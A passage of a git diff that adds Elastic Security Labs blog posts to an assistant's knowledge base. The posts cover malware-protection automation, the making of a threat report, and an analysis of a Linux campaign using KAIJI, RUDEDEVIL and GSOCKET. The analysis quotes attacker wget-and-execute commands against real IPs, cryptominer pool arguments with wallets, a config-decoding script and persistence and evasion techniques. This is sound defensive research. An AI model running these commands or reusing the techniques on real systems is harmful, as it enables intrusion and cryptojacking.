+    $a6 = "GetMozillaFromSQLite" ascii fullword
+```
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md
new file mode 100644
index 0000000000000..d26fbf2371e05
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md
@@ -0,0 +1,48 @@
+---
+title: "Automating the Security Protections rapid response to malware"
+slug: "automating-security-protections-rapid-response-to-malware"
+date: "2023-03-01"
+description: "See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models."
+author:
+  - slug: samantha-zeitlin
+image: "blog-security-endpoint-720x420.png"
+category:
+  - slug: machine-learning
+  - slug: detection-science
+---
+
+Cyber attacks on corporate networks were [<u>up 50% in 2021</u>](https://www.forbes.com/sites/chuckbrooks/2022/01/21/cybersecurity-in-2022--a-fresh-look-at-some-very-alarming-stats/?sh=675676ea6b61), and it’s [<u>expected that 2022 will see more of the same</u>](https://www.govtech.com/blogs/lohrmann-on-cybersecurity/the-top-22-security-predictions-for-2022). [<u>Elastic Endpoint Security</u>](https://www.elastic.co/endpoint-security/) includes a variety of protection layers to ensure maximum coverage against different types of malware. There have been a few examples recently of the need for [<u>fast, accurate updates</u>](https://www.elastic.co/blog/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper) of user environments in order to protect against the latest malware. Here at Elastic, we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users.
+
+As part of our security solution, we use a machine learning model to help us detect malware based on known characteristics. Since machine learning is never perfect, we deploy supplemental artifacts, including lists of known file hashes that range from malicious to benign. There are two scenarios when we might need to update these lists, which we’ll cover here. Using these, teams can experience a much faster response to malware.
+
+[Related article: [<u>Sandboxing anti-malware products for fun and profit</u>](https://www.elastic.co/blog/sandboxing-anti-malware-products-for-fun-and-profit)]
+
+## Scenario 1: The model isn’t perfect
+
+This happens pretty rarely, since our model has True Negative rates of 99.8%. But no model is perfect, and our True Positive rates vary from 99% (which is great) down to 97.9%, due to noisy data — particularly large bursts of near-duplicates. In applying machine learning to cybersecurity, data drift is an ever-present challenge and part of what makes it such an interesting problem.
+
+There are a couple of ways we can find out if our model is doing the wrong thing:
+
+1. **User feedback.**
+
+A user sends us an email telling us that a piece of custom software is being flagged as malware, but is actually safe.
+
+2. **Telemetry data coming back from our model running on customers’ machines.**
+
+We look at the volume and velocity of alerts, using Elastic’s Anomaly Detection feature to let us know if there is a sudden spike from a particular file. We also use patterns to help us confirm if an alert is coming from a single noisy machine, a test cluster, or a legitimate threat.
+
+The advantage of using lists as a backstop to machine learning is that it’s a fast and easy way to make sure our customers are protected from new malware, as well as protecting them from unnecessary noise from false positives.
+
+## Scenario 2: New forms of malware appear
+
+We typically find out about new kinds of malware from either security news/community resources, or our own Security Intelligence and Analytics team identifying new kinds of malware.
+
+When this happens, we can easily deploy small changes to lists. We update the model separately, because that takes longer.
+
+We’ve been steadily adding more automation to make this process of deploying updated lists to customers smoother and faster, with the goal of making it easy for anyone on the team to create and deploy an update. We’ve also been working on making the process of updating the model easier and faster.
+
+## Threats yet discovered…
+
+The Elastic Security Intelligence and Analytics team continues to research and respond to groundbreaking threats in its mission to help Elastic customers and the broader security community. If you’re using [<u>Elastic Security</u>](https://www.elastic.co/security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=elastic+security) already, you can expect to see our latest findings in the newsfeed within the platform. We’ll also post our latest findings on [<u>elastic.co/blog</u>](https://www.elastic.co/blog).
+
+Ready to become part of the Elastic Security community and take advantage of the team’s leading threat research? Get started with a free [<u>14-day trial of Elastic Cloud</u>](https://cloud.elastic.co/registration?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=trail) or [<u>download</u>](https://www.elastic.co/downloads/?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=download) the self-managed version of the Elastic Stack for free.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md
new file mode 100644
index 0000000000000..7a58953fb218a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md
@@ -0,0 +1,45 @@
+---
+title: "Behind the scenes: The making of a Global Threat Report"
+slug: "behind-the-scenes-global-threat-report"
+date: "2022-11-30"
+description: "What was our approach and process for creating a global threat report?"
+author:
+  - slug: mark-dufresne
+image: "gtr-blog-image-720x420.jpg"
+category:
+  - slug: reports
+---
+
+The first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go [check it out](https://www.elastic.co/explore/security-without-limits/global-threat-report).
+
+As a technical leader in [Elastic Security](http://www.elastic.co/security), I'd like to reveal a small amount about what goes into reports like this one and why it’s significant.
+
+## Why did we do it?
+
+If you didn’t already know this, you know it now: Elastic is a security company. We are also different — we’re open and transparent. We share exactly how our detections and preventions work in the [protections-artifacts](https://github.com/elastic/protections-artifacts) and [detection-rules](https://github.com/elastic/detection-rules) repos. We’ve launched [Elastic Security Labs](https://www.elastic.co/security-labs/) and regularly publish our research, discoveries, and tools. Anyone can spin up a [trial](https://cloud.elastic.co/registration) and try all our features — no barriers, no sales BS. This report is another way we’re bringing transparency to you. We want to empower you by sharing what we know and what we think is coming, and we will continue to expand the scope of what we share in the coming months.
+
+## How'd we do it?
+
+Put simply, by analyzing a vast amount of data. Behind [Elastic Security Labs](http://www.elastic.co/security-labs) is a large team of malware and intelligence analysts, security engineers, researchers, data scientists, and other experts. This team builds and maintains all the protection features in Elastic’s security products: blocking malware, in-memory threats, ransomware, and other malicious behaviors. You name it, we do it. To do this effectively, we need visibility into how our features perform and what threats they’re coming in contact with. We get that visibility through anonymous telemetry shared with us by our users (as well as through research our team carries out on threat feeds and other public datasets).
+
+Our researchers are in the telemetry data daily. Usually, we are focused on the performance of particular features, eliminating false positives and adding protection against emergent techniques, some of which you can learn about in our [threat report](https://www.elastic.co/explore/security-without-limits/global-threat-report). This battle never ends, and we don’t anticipate that changing any time soon.
+
+## Why now?
+
+As our user base rapidly grew over the past year, we came to the conclusion that we now observe a significant percentage of all threats. Upon hitting that critical mass, we decided to peel off some of our best researchers to zoom out, analyze the totality of what we’ve seen, and determine if we had a story worth sharing. We felt we probably had something to contribute to the community’s collective understanding of the threat landscape, and as you read the report, we hope you agree that we were right to think that.
+
+## Diving deeper
+
+With that backdrop, I can share a bit more about how a report like this comes to be. Under the leadership of [Devon Kerr](https://twitter.com/_devonkerr_), we built an eight-week plan to analyze and summarize the telemetry coming in from our various features. All our event telemetry data lives in Elasticsearch, which makes for straightforward summarization and visualization.
+
+Data normalization was a significant challenge. This included filtering out excessively noisy endpoints so results aren’t skewed, ignoring data from test clusters, ignoring alerts for data which we later realized were false positives, pulling together signals from our full [Elastic Security](http://www.elastic.co/security) solution, and more. It wasn’t the most glamorous work in the world, but it was foundational to producing meaningful results at the end. We’ll plan for a couple weeks in this phase again next time — it will always be a significant lift.
+
+Once the data was in good shape, we extracted the meaning from raw aggregations of a massive number of events to determine insights worth sharing, which help us understand the present state of the threat landscape. In particular, we wanted to explain the most prevalent threats we're seeing and put them in context. These are patterns that ebb and flow throughout the year, making an annual overview particularly useful for spotting the threats making the biggest impact. This led to the various charts and statistics laid out in the report. It took us a couple weeks to settle on a list among the team.
+
+Next, we had to write. Devon, [Andy Pease](https://twitter.com/andythevariable), [Daniel Stepanic](https://twitter.com/DanielStepanic), and [Terrance DeJesus](https://twitter.com/_xDeJesus) did the heavy lifting here. Anyone who’s done technical writing knows how important clarity and conciseness are in delivering a message that can be understood by the general public. A few dozen pages came together in a way we’re proud of. Importantly, we partnered closely with [Dhrumil Patel](https://www.linkedin.com/in/pateldhrumil/), our product management lead, and [Jen Ellard,](https://twitter.com/jellard8) security product marketing lead, for the [Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) effort to make sure our points were clear and meaningful to our user base.
+
+All of that brought us to the end of our eight week plan to develop the report. By late August, we were largely pencils-down on the content but far from done. We’re lucky to have a team of designers at Elastic to help us transform a wall of text in a Google doc into a PDF with style and graphics to enhance meaning and help our conclusions and recommendations jump off the page. We knew that this process would take time, many drafts, and a lot of back and forth. Planning and executing this piece of the project took about as long as the data gathering, analysis, and writing. We learned a lot about how long it takes to go from completed draft to final copy and will involve our internal partners early and often in the process.
+
+## Tell us what you think
+
+We’d love to hear your feedback about the first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report). More is on the way. We expect to make this an annual publication, and between now and then we’re hoping to deliver a more interactive version of this inaugural report.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md
new file mode 100644
index 0000000000000..8c52dd6765046
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md
@@ -0,0 +1,827 @@
+---
+title: "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse"
+slug: "betting-on-bots"
+date: "2024-09-27"
+description: "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels."
+author:
+  - slug: remco-sprooten
+  - slug: ruben-groenewoud
+image: "betting-on-bots.jpg"
+category:
+  - slug: malware-analysis
+  - slug: attack-pattern
+tags:
+  - linux
+  - kaiji
+  - rudedevil
+  - gsocket
+  - cryptomining
+---
+
+## Introduction
+
+In recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers. The attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access the threat actors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.
+
+The threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, telegram bots for communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as KAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a cryptocurrency miner, were used to exploit system resources for malicious purposes.
+
+Our investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers might be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted daily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the malware authors.
+
+This research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers' tactics, techniques, and procedures. We explore how they established initial access, the methods used for persistence and privilege escalation, and the malware deployed at each stage. Additionally, we discuss the command and control infrastructure, including the use of GSOCKET and Telegram for stealthy communication.
+
+## Execution flow
+
+### Initial access
+
+Our team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server running Apache2. Evidence of this compromise is seen in the execution of the `id` command via the Apache2 process, after which we see the threat actor exploiting the web server and deploying KAIJI malware under the `www-data` user account.
+
+Shortly after the Kaiji deployment, the attacker used the `www-data` account to download a script named `00.sh` from the URL `http://61.160.194[.]160:35130`, which, after further investigation, also hosted several versions of RUDEDEVIL malware.
+
+`00.sh` is a stager that:
+
+* Sets its default shell and PATH.
+* Deletes several log files to erase traces of execution.
+* Leverages `ps`, `netstat`, `lsof` and a list of common mining process names to kill any potential mining competition on the compromised host.
+* Flushes the `iptables` rules on the host, sets several `iptables` rules to block connections to specific destination ports and mining pools, and disables `iptables`.
+* Finally, a second stage (`sss6`/`sss68`) is downloaded and executed, and execution traces are erased.
+
+The figure below shows a compressed version of the stager. Lines annotated with `[...]` are shortened to enhance readability. 
+
+![Compressed version of the 00.sh stager](/assets/images/betting-on-bots/image5.png "Compressed version of the 00.sh stager")
+
+### Fileserver
+
+Via the backdoored web server process, the attacker downloaded and executed malware through the following command:
+
+```
+sh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 777 l86;./l86;rm -r l86
+```
+
+The `l64` and `l86` files are downloaded from `http://107.178.101[.]245:5488`, after which they are granted all permissions, executed, and removed. Looking at the server that is hosting these malware samples, we see the following:
+
+![Rejetto File Server Hosting Several Pieces of Malware](/assets/images/betting-on-bots/image30.png "Rejetto File Server Hosting Several Pieces of Malware")
+
+This seems to be a file server, hosting several types of malware for different architectures. The file server leverages the Rejetto technology. These malwares have upload dates and download counters. For example, the `download.sh` file that was uploaded September 10th, was already downloaded 3,100 times. 
+
+![Download Counter Indicating 3000+ Downloads Within 2 Weeks of Upload](/assets/images/betting-on-bots/image25.png "Download Counter Indicating 3000+ Downloads Within 2 Weeks of Upload")
+
+### RUDEDEVIL/LUCIFER
+
+Upon closer inspection, the file `sss6`, which was downloaded and executed, has been identified as the RUDEDEVIL malware. Early in the execution process, we encounter an embedded message characteristic of this malware family:
+
+![RUDEDEVIL Malware Characteristic](/assets/images/betting-on-bots/image11.png "RUDEDEVIL Malware Characteristic")
+
+```
+Hi, man. I\'ve seen several organizations report my Trojan recently, 
+Please let me go. I want to buy a car. That\'s all. I don\'t want to hurt others. 
+I can\'t help it. My family is very poor. In China, it\'s hard to buy a suite. 
+I don\'t have any accommodation. I don\'t want to do anything illegal. 
+Really, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc, 
+thank yo
+```
+
+We note that the files `l64` and `l86` that are hosted on the file server contain the same malware. When analyzing the execution flow of the malware we see that the main function of the malware performs several key tasks:
+
+* **Daemon Initialization:** The process is converted into a daemon using `daemon(1, 0)`.
+* **Socket Creation:** A socket is created and bound to a specific port.
+* **Signal Handling:** Custom signal handlers are set up for various signals.
+* **Service Initialization:** Several services are started using `SetFILE`.
+* **Privilege Handling:** It checks for root privileges and adjusts resource limits accordingly.
+* **Decryption:** The malware decrypts its configuration blobs.
+* **Thread Creation:** Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and CPU usage.
+* **Main Loop:** The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified duration.
+
+When examining the encryption routine, we find it utilizes XOR-based encoding:
+
+![DareDevil Encryption Routine](/assets/images/betting-on-bots/image13.png "DareDevil Encryption Routine")
+
+To decode the contents statically, we developed a basic Python snippet:
+
+``` python
+def DecryptData(data_block, encryption_key):
+   key_modifier = encryption_key & 0xFF
+   key_index = key_modifier // 0x5F  # 0x5F = 95 in decimal
+   modifier = (key_modifier - (key_index * 0x5F)) + 0x58  # 0x58 = 88 in decimal
+
+   for i in range(len(data_block)):
+       data_block[i] ^= modifier
+       data_block[i] &= 0xFF  # Ensure 8-bit value
+       data_block[i] += modifier
+       data_block[i] &= 0xFF  # Ensure 8-bit value
+
+   return data_block
+
+# Encoded data as hex strings
+encoded_data = [
+   '4c494356515049490c467978',
+   '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d372643400706314955032a593330233237587951215553552d464c0101414939514401515258414324273340254756564741404207004122782d50475555412d503106394d4c34554e48513926352054362a1e0d4e1e20',
+   '0f424d4e0f435536575649484b',
+   '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b',
+]
+
+encryption_key = 0x03FF  # 1023 in decimal
+
+# Process and decrypt each encoded data string
+for data in encoded_data:
+   # Convert hex string to list of integers
+   data_bytes = bytes.fromhex(data)
+   data_block = list(data_bytes)
+
+   # Decrypt the data
+   decrypted_block = DecryptData(data_block, encryption_key)
+
+   # Convert decrypted data back to bytes
+   decrypted_bytes = bytes(decrypted_block)
+   print("Decrypted text:", decrypted_bytes.decode('utf-8', errors='ignore'))
+```
+
+After decoding the configuration, the following values are revealed:
+
+* The first value C2 domain `nishabii[.]xyz`.
+* The second value reveals options that will be passed to XMRIG.
+* The third value shows the temp file location the malware uses.
+* The fourth and last string shows the download location for the XMRIG binary.
+
+### Thread Management in the Malware
+
+The malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail.
+
+#### Understanding the KillPid Function
+
+One of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function begins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters an infinite loop, repeatedly executing its tasks.
+
+At the heart of its functionality is an array called `sb_name`, which contains the names of processes the malware wants to terminate. 
+
+![RUDEDEVIL kill process array](/assets/images/betting-on-bots/image24.png "RUDEDEVIL kill process array")
+
+Every two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using a helper function called `getPidByName`. After each iteration, it moves to the next process in the list, ensuring all processes in `sb_name` are handled.
+
+Interestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10 minutes — before resuming its process checks. This extended sleep period is likely implemented to conserve system resources, ensuring the malware doesn't consume too much CPU time while monitoring processes.
+
+#### Understanding the Get_Net_Messages Function
+
+Another crucial thread is responsible for monitoring network traffic, specifically focusing on the `eth0` network interface. This functionality is handled by the `getOutRates` function. The function begins by setting up necessary variables and opening the `/proc/net/dev` file, which contains detailed network statistics for each interface.
+
+![Getting network rates from /proc/net/dev](/assets/images/betting-on-bots/image22.png "Getting network rates from /proc/net/dev")
+
+If the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the relevant network statistics. It specifically looks for the `eth0` interface, parsing the output rate data using a standard string parsing method. If successful, the function returns the output rate for `eth0`; otherwise, it returns `0`, ensuring the malware continues functioning even if an error occurs.
+
+This routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being sent or received across the interface.
+
+#### Understanding the Get_Cpu_Message Function
+
+For CPU monitoring, the malware uses the `GetCpuRates` function. This function continuously monitors the CPU usage by reading data from `/proc/stat`. Similar to how the network data is handled, the CPU statistics are read and parsed, allowing the malware to calculate the system's CPU usage.
+
+![Getting CPU information from /proc/stat](/assets/images/betting-on-bots/image34.png "Getting CPU information from /proc/stat")
+
+The function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system. If the file cannot be opened for some reason, the function logs an error and gracefully exits. However, as long as it’s able to read the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance.
+
+#### Understanding the Send_Host_Message Function
+
+Perhaps the most critical thread is the one responsible for sending system information back to the malware operators. The `_SendInfo` function performs this task by collecting data about the infected system’s CPU and network usage. It begins by setting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU and network usage into a string.
+
+![Sending system info back to the C2](/assets/images/betting-on-bots/image19.png "Sending system info back to the C2")
+
+Additionally, the function checks whether a particular process is running on the system and adjusts its formatted message accordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection.
+
+In essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load and network activity. The operators can use this information to assess the status of their infection and adjust their activities as needed.
+
+### Connecting to the Command-and-Control (C2) Server
+
+Once all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. This is managed by the `ConnectServer` function in the main thread, which handles communication with the server and executes commands remotely.
+
+#### Understanding the ConnectServer Function
+
+The first task the `ConnectServer` function performs is establishing a connection to the C2 server using `ServerConnectCli`. After successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection remains stable over extended periods of time.
+
+Once the connection is set up, the malware collects various pieces of system information, including the hostname, user information, CPU specs, and memory details. This information is then sent to the server as an initial data payload, providing the attackers with a detailed view of the infected machine.
+
+After this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The types of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues indefinitely, ensuring that the malware is ready to execute any command sent by its operators.
+
+When the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the socket, ending the session with the server.
+
+#### Command-and-Control (C2) Commands
+
+The `ConnectServer` function processes a variety of commands from the C2 server, each designed to control a different aspect of the infected system. Here’s a breakdown of the commands handled by the malware:
+
+* **Case 4:** The malware calls the `DealwithDDoS` function, likely initiating a Distributed Denial of Service (DDoS) attack.
+* **Case 5:** Sets the `StopFlag` to `1`, which could signal the malware to stop specific tasks.
+* **Case 6:** Downloads a file from the server using `http_get`, changes its permissions, and then executes it. This command allows the attackers to run additional malware or scripts on the infected machine.
+* **Case 7:** Executes a system command using the `system` function, providing the attackers with direct control over the system’s command line.
+* **Case 8:** Sets `StopCpu` to `0`, restarting any previously halted CPU tasks.
+* **Case 9:** Sets `StopCpu` to `1`, halting all CPU tasks.
+* **Case 0xA:** Updates the CPU mining configuration with new data and retrieves the PID of the current process, allowing the malware to modify its cryptocurrency mining operations.
+* **Case 0xB:** Sets `stopxmr` to `1`, effectively stopping the XMRIG miner.
+* **Case 0xC:** Resets `stopxmr` to `0` and retrieves the current process PID, resuming the mining activity.
+
+![Processing of C2 commands](/assets/images/betting-on-bots/image19.png "Processing of C2 commands")
+
+Each command gives the malware operators precise control over how the infected machine behaves, whether it’s participating in a DDoS attack, running new malware, or managing mining operations.
+
+### Variants of RUDEDEVIL Malware and XMRIG Configuration
+
+While the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being uploaded. The core functionality of these versions remained largely the same, with the only significant variation being the embedded XMRIG commands used for cryptocurrency mining.
+
+Each version of the malware was configured to connect to the same mining pool, `c3pool.org`, but with slight differences in the parameters passed to the XMRIG miner:
+
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0`
+
+Each of these commands directs the miner to connect to the same mining pool but specifies different wallets or configurations. By examining the `c3pool` application, we confirmed that both XMR addresses associated with these commands are currently active and mining.
+
+![C3pool mining revenue](/assets/images/betting-on-bots/image9.png "C3pool mining revenue")
+
+Additionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns, highlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining operations.
+
+## GSOCKET
+
+To establish persistence, the threat actor downloaded and installed [GSOCKET](https://github.com/hackerschoice/gsocket), a network utility designed to enable encrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent connections through the Global Socket Relay Network (GSRN). This open-source tool includes features like AES-256 encryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for encrypted file transfers, remote command execution, and even the creation of hidden services.
+
+Although GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.
+
+Once deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the system for active kernel processes to decide which process it will masquerade as:
+
+![GSOCKET Kernel Process Masquerading](/assets/images/betting-on-bots/image7.png "GSOCKET Kernel Process Masquerading")
+
+It then creates the `/dev/shm/.gs-1000` directory to download and store its binary in shared memory. Additionally, by default, it sets up an `/htop` directory under `/home/user/.config/htop/` to store both the GSOCKET binary and the secret key used for its operations. 
+
+Next, a cron job that runs the GSOCKET binary with the secret key every minute is set up.
+
+![GSOCKET Crontab Persistence](/assets/images/betting-on-bots/image21.png "GSOCKET Crontab Persistence")
+
+The binary is executed under the name of a kernel process using the `exec -a [process_name]` command, further enhancing the ability to evade detection. The cron job includes a base64 encoded command that, when decoded, ensures the persistence mechanism is regularly executed and disguised as a legitimate kernel process:
+
+When decoding the payload, we see how the `defunct.dat` secret key is used as an argument to execute the `defunct` binary, which is masqueraded as `[raid5wq]` through the use of `exec -a `command:
+
+In addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run control (`rc.local`) and Systemd. GSOCKET enumerates potential persistence locations:
+
+![GSOCKET Persistence Technique Enumeration](/assets/images/betting-on-bots/image29.png "GSOCKET Persistence Technique Enumeration")
+
+GSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and notifications:
+
+![GSOCKET Webhook Capabilities](/assets/images/betting-on-bots/image14.png "GSOCKET Webhook Capabilities")
+
+Finally, after installation, GSOCKET ensures that all files that are created or modified, will be timestomped to attempt to erase any trace of installation:
+
+![GSOCKET Timestomping Capability](/assets/images/betting-on-bots/image16.png "GSOCKET Timestomping Capability")
+
+These features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign, GSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection. 
+
+Additionally, a PHP payload was fetched from an external IP and saved as `404.php`, likely functioning as a backdoor for future access. We did not manage to obtain this payload.
+
+### Post compromise dwell time
+
+After a three-week period of quiet with no noticeable activity, the threat actors resumed operations by utilizing the built-in Python3 to establish a reverse connection to a new command-and-control server.
+
+After regaining access to the host, a newer version of the KAIJI malware was deployed.
+
+### KAIJI malware: a comparison to previous samples
+
+While investigating the files on the discovered file server, we saw a shell script. This shell script seems to be the main file used to download by an earlier stage, ensuring the correct architecture for the victim is used.
+
+![KAIJI Download.sh Script](/assets/images/betting-on-bots/image2.png "KAIJI Download.sh Script")
+
+The same Shell script is found in other reports where this script is used to deploy KAIJI.
+
+As part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with samples identified by Black Lotus Labs in 2022. Their detailed analysis of `Chaos` (KAIJI) can be found in their blog post[ here](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/).
+
+Using [BinDiff](https://github.com/google/bindiff), a binary comparison tool, we compared the functions in the binaries. The analysis revealed that the code in our sample was identical to the previously identified KAIJI sample from 2022.
+
+![Bindiff for Old and New Version of KAIJI](/assets/images/betting-on-bots/image18.png "Bindiff for Old and New Version of KAIJI")
+
+Although the code was the same, one critical difference stood out: the C2 server address. Although the functionality remained consistent in both binaries, they pointed to different C2 domains.
+
+Delving deeper into the disassembly, we identified a function named `main_Link`. This function is responsible for decoding the C2 server address used by the malware.
+
+![KAIJI main_link Function](/assets/images/betting-on-bots/image31.png "KAIJI main_link Function")
+
+Once decoded, the function searches for the `|(odk)/*-` postfix in the address and removes it, leaving only the C2 domain and port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change between samples.
+
+Given that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed look at its behaviors.
+
+![KAIJI Dynamic Analysis - Part 1](/assets/images/betting-on-bots/image12.png "KAIJI Dynamic Analysis - Part 1")
+
+After execution, KAIJI creates several files in the `/etc/` and `/dev/` directories, `/etc/id.services.conf`, `/etc/32678`, `/dev/.img` and `/dev/.old`. These scripts are places to establish persistence. 
+
+Two services are set up, `/etc/init.d/linux_kill` and `crond.service`. `crond.service` is executed by Systemd, while `linux_kill` is used for SysVinit persistence.
+
+After reloading the Systemd daemon, the first network connection to the C2 is attempted.
+
+![KAIJI Dynamic Analysis - Part 2](/assets/images/betting-on-bots/image18.png "KAIJI Dynamic Analysis - Part 2")
+
+Next, the `Systemd Late generator` service file is created. More information on the workings of `Systemd`, and different ways of establishing persistence through this method can be found in our recent blog series dubbed [Linux Detection Engineering -  A primer on persistence mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).
+
+KAIJI creates the `/boot/System.img.config` file, which is an executable that is executed through the previously deployed `Systemd` services. This binary, is amongst other binaries, another way of establishing persistence. 
+
+![KAIJI Dynamic Analysis - Part 3](/assets/images/betting-on-bots/image26.png "KAIJI Dynamic Analysis - Part 3")
+
+Next, KAIJI adjusts the `SELinux` policies to allow unauthorized actions. It searches audit logs for denied operations related to `System.img.conf`, generates a new `SELinux` policy to permit these actions, and installs the policy with elevated priority. By doing this, the malware bypasses security restrictions that would normally block its activity.
+
+Additionally, it sets up multiple additional forms of persistence through bash profiles, and creates another two malicious artifacts; `/usr/lib/libd1rpcld.so` and `/.img`.
+
+Right after, `/etc/crontab` is altered through an echo command, ensuring that the `/.img` file is executed by root on a set schedule.
+
+![KAIJI Dynamic Analysis - Part 4](/assets/images/betting-on-bots/image20.png "KAIJI Dynamic Analysis - Part 4")
+
+KAIJI continues to move several default system binaries to unusual locations, attempting to evade detection along the way.
+
+![KAIJI Dynamic Analysis - Part 5](/assets/images/betting-on-bots/image17.png "KAIJI Dynamic Analysis - Part 5")
+
+KAIJI uses the `renice` command to grant PID `2957`, one of KAIJI's planted executables, the highest possible priority (on a scale of -20 to 19, lowest being the highest priority), ensuring it gets more CPU resources than other processes.
+
+To evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities by manipulating how directories are mounted and viewed within the system.
+
+Finally, we see a trace of `cron` executing the `/.img`, which was planted in the `/etc/crontab` file earlier.
+
+## The saga continues
+
+Two weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the `www-data` user through the Apache2 process using the command:
+
+```
+sh -c wget http://91.92.241[.]103:8002/gk.php
+```
+
